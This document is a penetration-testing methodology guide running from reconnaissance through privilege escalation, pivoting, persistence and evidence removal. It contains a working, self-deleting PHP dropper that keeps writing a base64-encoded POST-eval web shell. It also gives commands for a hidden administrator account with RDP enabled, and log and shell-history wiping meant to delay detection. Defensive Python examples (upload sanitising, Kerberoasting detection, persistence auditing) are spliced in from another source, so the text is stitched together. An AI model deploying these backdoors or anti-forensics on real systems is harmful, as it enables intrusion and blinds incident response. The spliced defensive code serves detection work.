
Systematic Network Penetration Testing: From External Reconnaissance to Internal Compromise

Scope Definition and Engagement Rules

Establish explicit boundaries before initiating any assessment. Define IP ranges, domain names, and excluded systems in the formal rules of engagement. Determine testing windows, emergency contacts, and authorization documentation. Black-box assessments operate with zero prior knowledge of internal architecture, simulating adversarial threats without source code access or network diagrams.

External Reconnaissance Methodology

Host Discovery and Enumeration

Initiate with comprehensive host identification using network scanners. Nessus provides detailed vulnerability signatures alongside host detection, while Nmap offers granular control over probe types and timing templates. For rapid asset discovery across vast address spaces, Masscan executes asynchronous scanning at high packet rates, though accuracy trade-offs require validation through secondary TCP SYN scans.

Service Identification and Port Analysis

Map exposed services to identify attack vectors. Critical services requiring scrutiny include:

  • SSH (22/TCP): Credential stuffing attacks against weak authentication
  • Rsync (873/TCP): Unauthorized module access configurations
  • MySQL (3306/TCP): Default credentials and authentication bypass
  • Redis (6379/TCP): Unauthenticated command execution interfaces
  • SMB (445/TCP): Named pipe manipulation and EternalBlue-class vulnerabilities

Execute version detection scans to identify outdated service implementations vulnerable to known exploit chains.

Web Application Footprinting

Enumerate directory structures and sensitive endpoints using brute-force tools such as Dirbuster, Gobuster, or Cansina. Critical paths include administrative portals, configuration backups, database management interfaces (phpMyAdmin), and installation remnants.

Analyze robots.txt files for directory disclosure. While intended to guide search engine crawlers, these files often reveal paths requiring authentication or containing sensitive functionality:

User-agent: *
Disallow: /api/internal/
Disallow: /admin/dashboard/
Disallow: /backup/database.sql

Subdomain and Asset Discovery

Expand attack surface through subdomain enumeration using certificate transparency logs, DNS zone transfers, and dictionary-based brute forcing. Identify code repositories on GitHub or GitLab containing hardcoded API keys, database connection strings, or proprietary source code through automated search patterns.

Technology Fingerprinting

Determine underlying technologies using Whatweb or Wappalyzer to identify Content Management Systems (WordPress, Drupal, Django), web servers (Apache, Nginx, IIS), and JavaScript frameworks. Map identified technologies to specific CVE entries and publicly disclosed exploit modules.

Vulnerability Analysis

Automated Scanning Constraints

Web vulnerability scanners (AWVS, AppScan, OWASP ZAP) generate significant traffic volumes capable of destabilizing production environments. Execute during maintenance windows or against staging environments exclusively. Unauthorized automated scanning against production assets may violate computer fraud statutes.

Manual Verification Techniques

Validate automated findings and identify logic flaws through manual testing:

  • SQL Injection: Union-based extraction, blind boolean-based inference, and time-delay techniques
  • Cross-Site Scripting (XSS): Stored, reflected, and DOM-based payload delivery
  • Server-Side Request Forgery (SSRF): Internal service enumeration through URL handlers
  • XML External Entity (XXE): Out-of-band data exfiltration via DTD parameter entities
  • Insecure Deserialization: Java Object deserialization and PHP object injection
  • Remote Code Execution (RCE): Command injection through unsanitized input vectors

Initial Access and Exploitation

Web Shell Deployment

Upon discovering upload vulnerabilities or file inclusion flaws, deploy minimal web shells for persistent access. Upload functionality restrictions often permit image files; embed PHP code within JPEG EXIF data or append GIF headers to bypass magic byte validation.
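The defensive counterpart to the EXIF trick described above is to never store an uploaded image as received but to rebuild it server-side. The following added example (not code from the original article) parses a JPEG's marker segments and drops the COM and APPn segments where EXIF lives, keeping only what a decoder needs; the sample file is constructed and is not a real image.

```python
import struct

SOI, SOS, EOI, COM, APP0, APP14 = 0xD8, 0xDA, 0xD9, 0xFE, 0xE0, 0xEE

def strip_jpeg_metadata(data: bytes) -> bytes:
    """Rebuild a JPEG from its marker segments, dropping COM and every APPn
    segment except APP0 (JFIF) and APP14 (Adobe colour transform). EXIF is
    carried in APP1, so anything an uploader hid there never reaches disk."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    out = bytearray(b"\xff\xd8")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:
            return bytes(out + b"\xff\xd9")
        if marker == SOS:
            # Entropy-coded scan data follows; copy the remainder untouched.
            return bytes(out + data[pos:])
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segment = data[pos:pos + 2 + seg_len]
        pos += 2 + seg_len
        drop = marker == COM or (0xE1 <= marker <= 0xEF and marker != APP14)
        if not drop:
            out += segment
    raise ValueError("truncated JPEG: no SOS or EOI marker")

def segment(marker: int, payload: bytes) -> bytes:
    """Encode one marker segment; the length field counts itself plus payload."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed minimal JPEG: an APP1/EXIF segment carrying a benign script tag
# (standing in for whatever an uploader embeds), a DQT table and a short scan.
EXIF = segment(0xE1, b"Exif\x00\x00<?php echo 'marker'; ?>")
DQT = segment(0xDB, bytes(65))
SCAN = b"\xff\xda" + struct.pack(">H", 8) + bytes(6) + b"\x12\x34\x56" + b"\xff\xd9"
SAMPLE = b"\xff\xd8" + EXIF + DQT + SCAN

if __name__ == "__main__":
    cleaned = strip_jpeg_metadata(SAMPLE)
    print(len(SAMPLE), "->", len(cleaned), "bytes; tag present:", b"<?php" in cleaned)
```

Store the rebuilt file under a server-generated name in a location the web server will not execute scripts from; the segment filter removes hidden content but does not by itself make a misnamed `.php` upload harmless.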

Privilege Escalation Vectors

Post-compromise elevation techniques vary by platform:

Windows Environments:

  • Kernel exploits (CVE-2021-1732, CVE-2020-0787)
  • Service configuration permissions (Unquoted service paths, weak DACL permissions)
  • Credential harvesting from LSASS memory or SAM database extraction

Linux Environments:

  • SUID binary exploitation (nmap, vim, less)
  • Kernel vulnerability chains (Dirty COW, privilege escalation via eBPF)
  • Sudoers misconfigurations allowing command execution as root

Reverse Shell Establishment

Generate platform-specific payloads using MSFvenom or Cobalt Strike Beacon. Establish encrypted command and control channels through HTTPS or DNS tunneling to evade network detection systems.

Post-Exploitation and Pivoting

Internal Network Enumeration

Compromised perimeter hosts function as launch points for internal reconnaissance. Deploy SOCKS proxies or TCP port forwards through established shells to tunnel traffic into protected network segments.

# Establish dynamic port forward through compromised host
ssh -D 9050 -N -f compromised_user@perimeter_host

# Configure proxychains for internal scanning
proxychains nmap -sT -Pn 10.0.0.0/24

Lateral Movement Tactics

Harvest credentials from memory, configuration files, and browser storage to authenticate against adjacent systems. Techniques include:

  • Pass-the-Hash: NTLM hash authentication without plaintext passwords
  • Kerberoasting: Offline cracking of service account tickets
  • Token Impersonation: Hijacking privileged process tokens on Windows systems
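The Kerberoasting entry above leaves a recognisable trace in the Security log: event 4769 returning an RC4-encrypted (TicketEncryptionType 0x17) service ticket for a user-style service account, typically many in quick succession from one requester. The detection below is an added example, not code from the original article; the field names follow the Windows 4769 event and the sample records are constructed.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # TicketEncryptionType that yields an offline-crackable ticket

def is_roast_candidate(ev):
    """True for a successful 4769 that issued an RC4 ticket for a user-style
    service account (machine accounts end in '$'; krbtgt is excluded)."""
    if ev.get("EventID") != 4769 or ev.get("Status", "0x0") != "0x0":
        return False
    if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    svc = ev["ServiceName"].lower()
    return not svc.endswith("$") and svc != "krbtgt"

def detect_kerberoasting(events, min_services=2):
    """Group RC4 service-ticket requests by requesting account and flag
    accounts that pulled tickets for several distinct service accounts,
    the pattern a bulk SPN-ticket request leaves behind."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in per_requester.items() if len(s) >= min_services}

# Constructed sample records with the 4769 fields the checks use (not real logs).
def ev(user, service, etype, status="0x0"):
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status, "IpAddress": "10.0.0.25"}

SAMPLE_EVENTS = [
    ev("alice@CORP.LOCAL", "svc_sql", "0x17"),
    ev("alice@CORP.LOCAL", "svc_http", "0x17"),
    ev("alice@CORP.LOCAL", "svc_backup", "0x17"),
    ev("alice@CORP.LOCAL", "WS01$", "0x17"),                  # machine account: ignored
    ev("bob@CORP.LOCAL", "svc_sql", "0x12"),                  # AES256 ticket: normal
    ev("carol@CORP.LOCAL", "svc_sql", "0x17"),                # one RC4 request: below threshold
    ev("dave@CORP.LOCAL", "svc_http", "0x17", status="0xe"),  # KDC refused the etype
]

if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```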

Active Directory Penetration

Within domain environments, target the KRBTGT account hash for Golden Ticket fabrication, enabling persistent authentication across the forest. Enumerate Active Directory trusts to identify cross-domain attack paths.

Persistence Mechanisms

Web-Based Persistence

Deploy resilient backdoors utilizing polymorphic code to evade signature-based detection:

<?php
@ini_set('max_execution_time', 0);
@ignore_user_abort(true);
@unlink(__FILE__);
$interval = 300;
$payload = base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7ID8+');
while (true) {
    $filename = 'temp_' . substr(md5(uniqid()), 0, 8) . '.php';
    @file_put_contents($filename, $payload);
    sleep($interval);
}
?>

Embed code within legitimate error pages (404.php, 500.php) or modify existing framework components.

Windows System Persistence

  • Hidden Accounts: Create administrative users with $ suffix to hide from standard user listings
  • Registry Run Keys: Add entries to HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled Tasks: Establish recurring tasks executing payloads at logon or idle intervals
  • WMI Event Subscriptions: Create permanent event consumers triggering on specific system events

net user support_388945a0 /active:yes
net localgroup administrators support_388945a0 /add
net user support_388945a0 ComplexP@ssw0rd123
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Linux System Persistence

  • SSH Key Injection: Append attacker public keys to ~/.ssh/authorized_keys
  • Cron Job Scheduling: Establish recurring tasks in crontab or /etc/cron.d/
  • Systemd Services: Create unit files executing payloads on system startup
  • LD_PRELOAD Hijacking: Intercept shared library calls through environment variables

Artifact Sanitization

Minimize forensic evidence to delay incident detection. Complete elimination of intrusion artifacts is technically impossible against sophisticated logging infrastructure; focus instead on reducing detection probability and attribution confidence.

Windows Evidence Removal

Clear event logs selectively to avoid obvious gaps in logging:

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

Remove remote desktop connection artifacts from registry hives and delete Prefetch files containing executable metadata.

Linux Evidence Removal

Disable command history logging and purge existing records:

unset HISTFILE
export HISTFILESIZE=0
history -c
rm -rf ~/.bash_history
ln -sf /dev/null ~/.bash_history
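A defender-side audit for the Linux persistence items listed earlier and for the history tampering shown above, as an added example that is not part of the original article: it walks a filesystem root (live host or mounted image) and reports ld.so.preload entries, cron and systemd jobs launched from scratch directories, authorized_keys entries outside an approved set, and a .bash_history symlinked to /dev/null. The scratch-directory heuristic and the sample tree built by demo() are this example's assumptions.

```python
import os, re, tempfile
from pathlib import Path

# Scratch directories from which persistent jobs and services should not run.
UNTRUSTED_DIR = re.compile(r"(^|[\s=])(/tmp|/dev/shm|/var/tmp)/")

def audit_persistence(root, approved_keys):
    """Audit a filesystem root for the SSH key, cron, systemd and LD_PRELOAD
    persistence items and for bash history redirected to /dev/null.
    Returns human-readable findings in filesystem order."""
    root, findings = Path(root), []
    preload = root / "etc/ld.so.preload"
    if preload.is_file() and preload.read_text().strip():
        findings.append(f"LD_PRELOAD: {preload} loads {preload.read_text().strip()}")
    for sub in ("etc/cron.d", "etc/systemd/system"):
        for f in sorted((root / sub).glob("*")):
            if f.is_file() and UNTRUSTED_DIR.search(f.read_text()):
                findings.append(f"{sub}: {f.name} runs code from a scratch directory")
    for home in sorted((root / "home").glob("*")):
        keys = home / ".ssh/authorized_keys"
        if keys.is_file():
            for line in keys.read_text().splitlines():
                if line.strip() and line.strip() not in approved_keys:
                    findings.append(f"ssh: unapproved key in {keys}: {line.split()[-1]}")
        hist = home / ".bash_history"
        if hist.is_symlink() and os.readlink(hist) == "/dev/null":
            findings.append(f"history: {hist} is linked to /dev/null")
    return findings

def demo():
    """Build a constructed sample root (not a real host) and audit it."""
    base = Path(tempfile.mkdtemp())
    admin_key = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@ws"
    files = {
        "etc/ld.so.preload": "/tmp/.x/libhook.so\n",
        "etc/cron.d/update": "*/5 * * * * root /dev/shm/.u/run.sh\n",
        "etc/cron.d/logrotate": "0 1 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "etc/systemd/system/cleanup.service": "[Service]\nExecStart=/var/tmp/.c/agent\n",
        "home/dev/.ssh/authorized_keys": admin_key + "\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEROGUEKEY x@x\n",
    }
    for rel, text in files.items():
        (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / rel).write_text(text)
    (base / "home/dev/.bash_history").symlink_to("/dev/null")
    return audit_persistence(base, {admin_key})

if __name__ == "__main__":
    print("\n".join(demo()))
```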

Truncate system logs in /var/log/ and remove authentication records from /var/log/wtmp and /var/log/btmp using specialized utilities.

Documentation Standards

Compile findings into structured reports containing executive summaries, technical vulnerability details, risk ratings using CVSSv3 scoring, proof-of-concept demonstrations, and prioritized remediation strategies. Include network diagrams illustrating attack paths and recommended security control implementations.
